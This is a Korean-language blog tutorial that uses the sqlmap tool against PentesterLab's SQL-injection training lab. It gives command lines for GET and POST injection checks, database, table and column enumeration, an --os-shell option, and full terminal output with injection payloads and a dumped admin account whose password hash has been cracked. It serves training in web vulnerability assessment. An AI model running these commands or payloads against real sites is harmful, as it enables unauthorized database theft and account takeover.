홈페이지 취약점 분석 이야기 파일 지도 사진 깨알






>> 목록보이기
#웹취약점 분석도구 #sqlmap #SQL구문삽입 #SQL인젝션 #SQL Injection #DB유출 #관리자계정탈취 #PentesterLab #From SQL Injection to Shell 1

SQL구문삽입 분석도구 sqlmap 간단 사용법

sqlmap®

sqlmap: automatic SQL injection and database takeover tool은 공개 모의침투 도구로 SQL구문삽입(SQL Injection) 취약점을 탐지/진단하고 데이터베이스에 직간접적으로 접근할 수 있는 취약점 분석 도구이다. SQL 구문삽입 공격은 DB 구조 파악이 가장 힘든 작업인데, 수작업으로 진행하기에는 매우 많은 시간이 걸린다. sqlmap은 DB 구조파악, 테이블 내용 유출 등을 자동화해주기 떄문에 웹취약점에 대한 수동분석 과정에서 상당히 많은 시간을 절약할 수 있게 도와주는 매우 훌륭한 프로그램이다.

칼리리눅스(Kali Linux) 운영체제에서는 다음과 같이 간단하게 설치할 수 있다.

apt-get install sqlmap

웹 취약점 분석에서 가장 많이 사용되는 sqlmap의 용례는 다음과 같다. (여기서는 PentesterLab의 From SQL Injection to Shell 훈련장을 대상으로 예를 든다.)

- GET 방식의 입력값 점검

sqlmap -u "http://192.168.206.131/cat.php?id=1"

- GET 방식의 입력값 점검: DBMS를 알고 있는 경우

sqlmap -u "http://192.168.206.131/cat.php?id=1" --dbms=mysql

- 데이터베이스 목록 열람

sqlmap -u "http://192.168.206.131/cat.php?id=1" --dbs

- 데이터베이스 목록 열람

sqlmap -u "http://192.168.206.131/cat.php?id=1" --dbs

- POST 방식의 입력값 점검

sqlmap -u "http://192.168.206.131/admin/index.php" --data "user=USER&password=PASS"

- 특정 변수를 지정하여 점검할 경우

sqlmap -u "http://192.168.206.131/admin/index.php" --data "user=USER&password=PASS" -p user

- 운영체제 명령어 실행 가능성을 점검할 때

sqlmap -u "http://192.168.206.131/admin/index.php" --data "user=USER&password=PASS" --os-shell

GET 방식의 입력에 대한 공격 사례

GET 방식의 Web Application, PentesterLab's From SQL Injection to Shell
[ GET 방식의 URL 매개변수 전달 ]

위의 그림은 PentesterLab의 From SQL Injection to Shell이라는 훈련장 접속 화면이다. 이미지를 보여주는 cat.phpid 변수를 대상으로 sqlmap을 이용하여 SQL구문삽입 취약점을 점검하는 방법은 다음과 같다.

sqlmap -u "http://192.168.206.131/cat.php?id=1"

위의 id 변수는 취약점이 존재한다. 취약점을 이용하여 sqlmap으로 관리자 계정을 탈취하는 사례는 마지막에 실었다.

POST 방식의 입력에 대한 공격 사례

POST 방식의 Web Application, PentesterLab's From SQL Injection to Shell
[ POST 방식의 로그인 인터페이스 ]

위의 그림은 SQL Injection to Shell 훈련장의 관리자 페이지 접속 화면이다. ID/PW를 이용하여 로그인하는 페이지이며 POST 방식으로 구현되어 있다. POST 방식에서는 POST의 값을 "--data" 옵션으로 지정할 수 있다.

sqlmap -u "http://192.168.206.131/admin/index.php" --data "user=USER&password=PASS"

HTTP 프록시나 HTML 소스를 분석하면 로그인은 /admin/index.php가 담당하며 사용자가 POST로 전달하는 입력값은 "user=관리자ID&password=관리자암호"와 같은 방식임을 추정하여 위와 같이 sqlmap으로 SQL 구문삽입 취약점을 점검할 수 있다.

SQL구문삽입 공격을 통한 관리자 계정 탈취 사례

PentesterLab의 From SQL Injection to Shell 훈련장의 "/cat.php?id=1"을 대상으로 하는 SQL 구문삽입 취약점 점검 및 DB 유출 과정을 살펴보자.

먼저 URL만을 제공하여 SQL 구문삽입 취약점이 있는 지 살펴본다.

root@kali:~# sqlmap -u "http://192.168.206.131/cat.php?id=1"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.0.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:36:16

[10:36:16] [INFO] testing connection to the target URL
[10:36:16] [INFO] heuristics detected web page charset 'ascii'
[10:36:16] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[10:36:16] [INFO] testing if the target URL is stable
[10:36:17] [INFO] target URL is stable
[10:36:17] [INFO] testing if GET parameter 'id' is dynamic
[10:36:17] [INFO] confirming that GET parameter 'id' is dynamic
[10:36:17] [INFO] GET parameter 'id' is dynamic
[10:36:17] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:36:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting attacks
[10:36:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[10:36:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:36:22] [WARNING] reflective value(s) found and filtering out
[10:36:22] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ruby")
[10:36:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:36:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[10:36:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:36:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[10:36:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:36:22] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[10:36:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:36:22] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[10:36:22] [INFO] testing 'MySQL inline queries'
[10:36:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[10:36:22] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[10:36:22] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:36:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[10:36:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[10:36:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:36:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:36:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:36:42] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[10:36:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:36:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:36:42] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:36:42] [INFO] target URL appears to have 4 columns in query
[10:36:42] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[10:36:42] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 45 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7760=7760

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6274 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6274=6274,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(0x7171627871, 0x51746a585a576a47714e4c4461467951454c6c7a544b6d41614b555a4e4468634c68526d62646a62, 0x716b767a71), NULL-- xkYE
---
[10:36:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[10:36:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.206.131'

[*] shutting down at 10:36:45

root@kali:~#

기본적인 점검에서 id 변수가 취약하며, 운영체제는 "Linux Debian 6.0 (squeeze)", 웹 어플리케이션은 "PHP 5.3.3, Apache 2.2.16" 기반이며, DBMS는 "MySQL >= 5.0" 등의 정보를 알아낼 수 있었다.

일반적인 웹취약점분석에서는 SQL구문삽입 취약점 분석을 여기서 중단하여도 무방하다. 관리자 페이지 내에 존재하는 취약점 점검 등이 필요한 경우에는 계정정보를 알아내기 위해서 추가적인 DB조회를 계속 진행할 수도 있을 것이다.

취약한 계정 관리에 대한 분석, 홈페이지 관리기능 분석을 위한 관리자 ID/PW 열람 등 추가 분석작업에 도움을 받기 위해서는 DB내용을 조회해볼 필요가 있다. DB를 조회할 때는 "--dump" 옵션만으로 데이터베이스 전체를 열람할 수도 있다. 다만 이 경우에는 시간 제약상 시도하지 않는 것이 좋다. 일반적으로 sqlmap 분석 순서는 1) SQL 인젝션 판별, 2) 데이터베이스 목록 조회, 3) 테이블 목록 조회, 4) 테이블 스키마 조회, 5) 테이블 덤프 등으로 나열할 수 있다.

먼저, MySQL이 관리하는 데이터베이스 목록을 가져와 보자.

root@kali:~# sqlmap -u "http://192.168.206.131/cat.php?id=1" --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.0.10#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:37:15

[10:37:15] [INFO] resuming back-end DBMS 'mysql' 
[10:37:15] [INFO] testing connection to the target URL
[10:37:15] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7760=7760

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6274 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6274=6274,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(0x7171627871, 0x51746a585a576a47714e4c4461467951454c6c7a544b6d41614b555a4e4468634c68526d62646a62, 0x716b767a71), NULL-- xkYE
---
[10:37:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[10:37:15] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] photoblog

[10:37:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.206.131'

[*] shutting down at 10:37:15

root@kali:~#

위의 예에서는 sqlmap--dbs 옵션으로 현재 웹 어플리케이션("/cat.php")이 접근할 수 있는 MySQL 데이터베이스 이름을 모두 조회하였다. information_schema는 MySQL의 시스템 카탈로그(System Catalog)이다. 따라서 이 서버스에서 사용하는 데이터베이스는 photoblog임을 알 수 있다.

photoblog DB의 테이블 목록을 뽑아낸다("--tables" 옵션).

root@kali:~# sqlmap -u "http://192.168.206.131/cat.php?id=1" -D photoblog --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.0.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:37:49

[10:37:49] [INFO] resuming back-end DBMS 'mysql' 
[10:37:49] [INFO] testing connection to the target URL
[10:37:49] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7760=7760

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6274 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6274=6274,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(0x7171627871, 0x51746a585a576a47714e4c4461467951454c6c7a544b6d41614b555a4e4468634c68526d62646a62, 0x716b767a71), NULL-- xkYE
---
[10:37:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[10:37:49] [INFO] fetching tables for database: 'photoblog'
Database: photoblog
[3 tables]
+------------+
| categories |
| pictures   |
| users      |
+------------+

[10:37:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.206.131'

[*] shutting down at 10:37:49

root@kali:~# 

Sqlmap에서 -D photoblog --tables 옵션을 사용하여 categories, pictures, users의 3개 테이블 이름을 찾아냈다.

회원정보는 users 테이블에 저장되어 있을 것으로 추정할 수 있다. 확인을 위해서 users 테이블의 구조를 파악한다("--columns" 옵션).

root@kali:~# sqlmap -u "http://192.168.206.131/cat.php?id=1" -D photoblog -T users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.10#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:38:27

[10:38:27] [INFO] resuming back-end DBMS 'mysql' 
[10:38:27] [INFO] testing connection to the target URL
[10:38:27] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7760=7760

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6274 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6274=6274,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(0x7171627871, 0x51746a585a576a47714e4c4461467951454c6c7a544b6d41614b555a4e4468634c68526d62646a62, 0x716b767a71), NULL-- xkYE
---
[10:38:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[10:38:27] [INFO] fetching columns for table 'users' in database 'photoblog'
Database: photoblog
Table: users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | mediumint(9) |
| login    | varchar(50)  |
| password | varchar(50)  |
+----------+--------------+

[10:38:27] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.206.131'

[*] shutting down at 10:38:27

root@kali:~#

users 테이블은 id, login, password의 3개 컬럼(column)으로 구성되어있다. id, login, password 등의 단어로부터 users 테이블이 회원정보를 저장하는 곳임을 알 수 있다. 이 테이블을 조회하면 ID, 비밀번호를 알아낼 수 있을 것이다. --columns 옵션 대신 --dump 옵션을 사용하여 다음과 같이 users 테이블의 내용을 모두 조회(덤프)한다.

root@kali:~# sqlmap -u "http://192.168.206.131/cat.php?id=1" -D photoblog -T users --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.10#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:38:52

[10:38:53] [INFO] resuming back-end DBMS 'mysql' 
[10:38:53] [INFO] testing connection to the target URL
[10:38:53] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 7760=7760

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 6274 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6274=6274,1))),0x716b767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL, NULL, CONCAT(0x7171627871, 0x51746a585a576a47714e4c4461467951454c6c7a544b6d41614b555a4e4468634c68526d62646a62, 0x716b767a71), NULL-- xkYE
---
[10:38:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[10:38:53] [INFO] fetching columns for table 'users' in database 'photoblog'
[10:38:53] [INFO] fetching entries for table 'users' in database 'photoblog'
[10:38:53] [INFO] analyzing table dump for possible password hashes
[10:38:53] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[10:38:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[10:38:59] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[10:39:00] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[10:39:00] [INFO] starting 2 processes 
[10:39:02] [INFO] cracked password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2'                
[10:39:08] [INFO] postprocessing table dump
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[10:39:08] [INFO] table 'photoblog.users' dumped to CSV file '/root/.sqlmap/output/192.168.206.131/dump/photoblog/users.csv'
[10:39:08] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.206.131'

[*] shutting down at 10:39:08

root@kali:~#

users 테이블을 덤프함으로써 admin 계정의 비밀번호를 위와 같이 알아낼 수 있다. 공격자는 홈페이지 관리자의 권한으로 누리집에 접근하여 관리기능에서의 취약점을 분석하게 될 것이다. 일반적으로 홈페이지 관리기능은 관리자만 접근한다는 선입관이 있기 때문에 비교적 취약점이 많은 편이다. 이 때문에 관리자 권한이 탈취되면 웹서버가 장악될 가능성이 일반적인 경우보다 훨씬 높은 편이다.

[처음 작성한 날: 2016.11.07]    [마지막으로 고친 날: 2016.11.11] 


< 이전 글 : 웹취약성분석 관련 파일 목록 (2016.11.08)

> 다음 글 : 웹취약점 분석 도구로서의 THC Hydra (2016.11.07)


크리에이티브 커먼즈 라이선스 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문

.. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ...... ... ... ] .. [ .../ ..../ ......./ .. ./// ../ ... .. ... .. -- -- | - .. .... | ... / .. .../ ... {] . .. .. .. ..| ...... .../ .../ .. ./// ../ ... .. ... ...| ..../ ./ ... / ..| ....| ........ / ... / .... ...... ... ... ] .. [ .../ ..../ ......./ .....| ..../ ./ ... / ..| ....| ........ / ... / .... ...| ..../ ./ ... / ..| ....| ........ / ... / .... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .